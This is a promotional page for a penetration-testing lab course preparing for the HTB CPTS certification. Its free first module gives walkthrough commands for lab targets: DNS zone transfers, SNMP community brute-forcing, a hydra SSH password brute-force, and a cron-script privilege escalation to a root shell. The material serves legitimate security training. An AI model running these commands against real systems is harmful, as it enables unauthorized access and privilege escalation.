XR RatLabs
CPTS Preparation

HTB Certified Penetration Testing Specialist

Seven modules covering the full HTB CPTS curriculum — infrastructure footprinting, common service attacks, web exploitation, database attacks, directory services, and a complete Active Directory engagement chain.

7 Modules
15 Machines
Free 3 Labs / Day
Start Free →

CPTS vs OSCP — What's Different

Both are hands-on hacking certs, but they test different depth and breadth.

Deeper Enumeration Focus

CPTS places heavier emphasis on systematic footprinting — every service gets its own enumeration methodology before exploitation is attempted. The HTB curriculum dedicates entire modules to protocols like LDAP, SNMP, SMTP, and MSSQL that OSCP treats as background knowledge.

Active Directory Depth

CPTS expects you to know BloodHound attack paths, ACL abuse (GenericWrite, WriteDACL, GenericAll), Kerberoasting, AS-REP roasting, and DCSync cold. The AD section of the exam is significantly more complex than the OSCP AD set. 

bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
# Then: Find Shortest Paths to Domain Admins in BloodHound UI

No Buffer Overflow

CPTS does not include a standalone BOF machine. Instead it emphasises web application attacks, API security, and lateral movement depth. If you are studying for CPTS only, you can skip the BOF module on the OSCP path — but it's still excellent practice.

Report-Writing is Graded

CPTS is a professional certification exam that includes a report writing component. Practice documenting every finding as you work through these labs: service version, vulnerability, exploitation steps, and impact. Your report is part of your exam grade. 

# Report sections per finding:
- Service & Version
- Vulnerability / Misconfiguration
- Proof (screenshot + flag)
- Remediation recommendation

The Seven Modules

Module 1 is free. Modules 2–7 can be unlocked one at a time with a 24-hour timer, or instantly with Premium.

Module 1 · 🔎

Reconnaissance & Footprinting

CPTS emphasises a structured enumeration methodology before any exploitation attempt. These labs cover infrastructure-level recon: DNS zone mapping and SNMP device enumeration — two techniques that produce actionable data on every enterprise engagement.

HTB CPTS — Footprinting module
  • DNS zone transfer and subdomain brute-forcing (dig, dnsenum, fierce)
  • SNMP community string discovery and OID tree walking (onesixtyone, snmpwalk)
  • nmap service/version fingerprinting with default script sets
  • Building an accurate attack-surface inventory before touching exploits
Axferia Walkabout
Attack Pattern DNS — Zone Transfer + Cron PrivEsc

CPTS angle: CPTS expects you to document every record returned by the zone transfer and map it to potential attack vectors before touching an exploit.

1 — Full port scan

nmap -sC -sV -p- -T4 TARGET
nmap -sU --top-ports 50 TARGET

2 — DNS Zone Transfer

dig SOA @TARGET lab.local
dig AXFR lab.local @TARGET
dnsenum --dnsserver TARGET --enum lab.local

3 — Credential brute-force / reuse

hydra -l labuser -P /usr/share/wordlists/rockyou.txt ssh://TARGET -t 4

4 — Privilege Escalation via writable cron script

cat /etc/crontab && ls /etc/cron*
find / -writable -name "*.sh" 2>/dev/null
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# wait for cron to run, then:
/bin/bash -p
Attack Pattern SNMP — Community Brute-Force + SUID PrivEsc

CPTS angle: SNMP often exposes running processes, open ports, and usernames that DNS and nmap miss. Always scan UDP 161 early.

1 — SNMP Community Discovery

nmap -sU -p 161 --script snmp-brute TARGET
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt TARGET

2 — OID Enumeration

# Running processes
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.2.1.25.4.2.1.2
# Listening ports
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.2.1.6.13.1.3
# User accounts
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.4.1.77.1.2.25

3 — SUID Escalation

find / -perm -4000 -type f 2>/dev/null
# Cross-reference with https://gtfobins.github.io/
Module 2 · 📡

Attacking Common Services — Network Protocols Locked

The HTB CPTS Attacking Common Services module covers every legacy protocol you will encounter in enterprise environments. Telnet, TFTP, and SMTP represent three distinct attack surfaces: credential brute-force, anonymous file retrieval, and user enumeration.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 3 · 📂

Attacking Common Services — File Shares Locked

Rsync, SMB, and FTP are the three most common misconfigured file-share services in real environments. The CPTS curriculum drills anonymous access, null session enumeration, and credential extraction from synced files — all essential for the CPTS exam's 'Attacking Common Services' section.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 4 · 🌐

Web Application Attacks — Command Injection Locked

Command injection is one of the highest-impact web vulnerabilities in the CPTS exam. This lab isolates the full exploitation chain: directory enumeration → vulnerable parameter discovery → OS command injection → reverse shell → privilege escalation. Exactly the methodology taught in the CPTS Command Injections module.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 5 · 🗄️

Attacking Common Services — Databases Locked

MySQL and Redis are two of the most frequently misconfigured database services in real engagements. CPTS teaches extraction, lateral movement via credential reuse, and code-execution paths through service trust abuse. These two labs cover both the relational and key-value attack surfaces.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 6 · 📋

Directory Services & Credential Harvesting Locked

LDAP anonymous binds expose the full internal user directory on misconfigured enterprise deployments. The CPTS footprinting module covers LDAP enumeration as a prerequisite for Active Directory attacks — extracting usernames, group memberships, and service account attributes that feed downstream attacks.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 7 · 🏢

Active Directory Enumeration & Attacks Locked

Active Directory attacks are the centrepiece of the CPTS exam and the most common path to Domain Admin in real engagements. The CorpNet pair simulates a real Windows domain: domain controller plus workstation. Enumerate, escalate, move laterally, and own the domain.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium
Module 8 · 🕷️

Active Directory — Advanced Attacks Locked

The MegaCorp domain controller has a Group Policy Preferences update sitting in SYSVOL — a Groups.xml file with a service account password encrypted using the publicly known GPP AES key (MS14-025). Start from an exposed web config on the workstation, harvest SYSVOL credentials, and achieve full domain compromise via a classic GPP/SYSVOL attack chain.

Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.

Sign in to unlock free ⭐ Get Premium